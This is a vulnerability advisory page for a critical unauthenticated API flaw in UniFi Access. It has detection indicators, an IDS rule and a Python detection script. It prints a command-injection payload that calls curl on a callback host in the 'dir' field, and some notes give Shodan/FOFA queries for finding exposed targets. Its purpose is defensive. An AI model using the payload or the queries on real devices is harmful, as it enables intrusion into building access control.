CVE-2025-52665
published 2025-10-31

Priority: P1 (92, critical)
CVSS 3.1: 10.0 (AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H)
Exploitation: in-the-wild exploit; listed in VulnCheck KEV (exploited in the wild)
EPSS: 40.97% (98.5th percentile)
A malicious actor with access to the management network could exploit a misconfiguration in UniFi’s door access application, UniFi Access, that exposed a management API without proper authentication. This vulnerability was introduced in Version 3.3.22 and was fixed in Version 4.0.21 and later. Affected Products: UniFi Access Application (Version 3.3.22 through 3.4.31). Mitigation: Update your UniFi Access Application to Version 4.0.21 or later.

Affected (2 ranges)

Vendor       | Product                  | Version range      | Fixed in
ubiquiti_inc | unifi_access_application | 3.3.22 – 3.4.31    |
ui           | unifi_access             | >= 3.3.22 < 4.0.21 | 4.0.21

Detection & IOCs (extracted from sources)

URL: /api/v1/user_assets/touch_pass/keys
URL: /api/ucore/backup/export
URL: /api/v1/user_assets/nfc
Port: 9780
Command: {"dir":"/tmp/<rand>-; curl http://<interactsh-url>/; #"}
Snort/Suricata (ET) rule:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS UniFi Access Unauthenticated Remote Code Execution (CVE-2025-52665)"; flow:established,to_server; http.uri; content:"/api/ucore/backup/export"; fast_pattern; http.request_body; content:"|22|dir|22 3a|"; pcre:"/^\s*?\x22[^\x22]*?[\x3b\x26\x60\x7c\x24]/R"; reference:url,www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000; reference:cve,2025-52665; classtype:web-application-attack; sid:2065968; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_12_01, cve CVE_2025_52665, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_12_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Detect unauthenticated GET requests to /api/v1/user_assets/touch_pass/keys on port 9780; a successful response will contain JSON fields 'google_pass_auth_key' and/or 'apple_nfc' with HTTP 200 and Content-Type application/json.
  • Detect unauthenticated POST to /api/ucore/backup/export on port 9780 with a 'dir' JSON field containing shell metacharacters (;, &, `, |, $) — indicative of command injection exploitation.
  • Detect unauthenticated POST to /api/v1/user_assets/nfc on port 9780; a successful exploitation response returns JSON body containing 'CODE_SUCCESS' with HTTP 200.
  • Use Shodan/FOFA to identify exposed UniFi targets: Shodan query 'html:"UniFi Dream Machine SE"' or 'http.html:"UniFi OS"'; FOFA query 'body="UniFi OS"'.
  • Confirm target is a vulnerable UniFi device by checking the /login page for the strings 'UniFi OS' or 'UniFi Dream Machine SE' before attempting exploitation steps.
  • The vulnerability was introduced in version 3.3.22 and only affects UniFi Access Application versions 3.3.22 through 3.4.31; versions prior to 3.3.22 and 4.0.21+ are not affected.
  • The Nuclei template for the RCE vector (CVE-2025-52665) is marked 'verified: false', meaning the RCE chain via /api/ucore/backup/export has not been independently confirmed by the template author.
  • The Snort/ET rule requires TLS decryption to be effective, as indicated by the metadata deployment tag 'SSLDecrypt' and 'tls_state TLSDecrypt'.
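The three request-level checks in the notes above (unauthenticated traffic to port 9780 against the touch_pass keys, backup export and nfc endpoints, with the ET rule's shell-metacharacter test on the 'dir' field) as an added example that is not part of this record or of Ubiquiti's code: a small Python classifier over constructed request/response records. The function names classify and scan, the record keys, the SAMPLE_RECORDS data and the example.invalid host are all assumptions made for the example.

```python
import json
import re

# Added example (not Ubiquiti's code): classify constructed HTTP records for the
# three unauthenticated UniFi Access endpoints listed in the detection notes.
TARGET_PORT = 9780
SHELL_META = re.compile(r"[;&`|$]")  # same metacharacter set as the ET rule's PCRE

def classify(rec):
    """Findings for one record: a dict with the constructed keys method, port,
    path, authenticated, body, status, content_type, resp_body."""
    findings = []
    if rec.get("port") != TARGET_PORT or rec.get("authenticated"):
        return findings  # only unauthenticated traffic to 9780 is in scope
    method, path, resp = rec.get("method"), rec.get("path"), rec.get("resp_body", "")
    ok_json = rec.get("status") == 200 and rec.get("content_type", "").startswith("application/json")
    if method == "GET" and path == "/api/v1/user_assets/touch_pass/keys":
        findings.append("unauth touch_pass keys request")
        if ok_json and ("google_pass_auth_key" in resp or "apple_nfc" in resp):
            findings.append("touch_pass keys disclosed")
    elif method == "POST" and path == "/api/ucore/backup/export":
        findings.append("unauth backup export request")
        try:
            body = json.loads(rec.get("body", ""))
        except ValueError:
            body = {}
        d = body.get("dir") if isinstance(body, dict) else None
        if isinstance(d, str) and SHELL_META.search(d):
            findings.append("shell metacharacters in dir")
    elif method == "POST" and path == "/api/v1/user_assets/nfc":
        findings.append("unauth nfc request")
        if rec.get("status") == 200 and "CODE_SUCCESS" in resp:
            findings.append("nfc request succeeded")
    return findings

# Constructed sample records (not real traffic), one per monitored endpoint.
SAMPLE_RECORDS = [
    {"method": "GET", "port": 9780, "path": "/api/v1/user_assets/touch_pass/keys",
     "authenticated": False, "status": 200, "content_type": "application/json",
     "resp_body": '{"google_pass_auth_key": "x", "apple_nfc": "y"}'},
    {"method": "POST", "port": 9780, "path": "/api/ucore/backup/export",
     "authenticated": False, "status": 500, "content_type": "text/plain",
     "body": '{"dir": "/tmp/abc-; curl http://example.invalid/; #"}', "resp_body": ""},
    {"method": "POST", "port": 9780, "path": "/api/v1/user_assets/nfc",
     "authenticated": False, "status": 200, "content_type": "application/json",
     "body": "{}", "resp_body": '{"code": "CODE_SUCCESS"}'},
]

def scan(records):  # index -> findings, for records that produced any
    return {i: f for i, r in enumerate(records) if (f := classify(r))}
```

Authenticated sessions and other ports are skipped on purpose, so the same logic can be fed from a reverse proxy or decrypted-traffic log without flagging normal console use.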

CVSS provenance

NVD (v3.1): 10.0 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
VulnCheck: 10.0 CRITICAL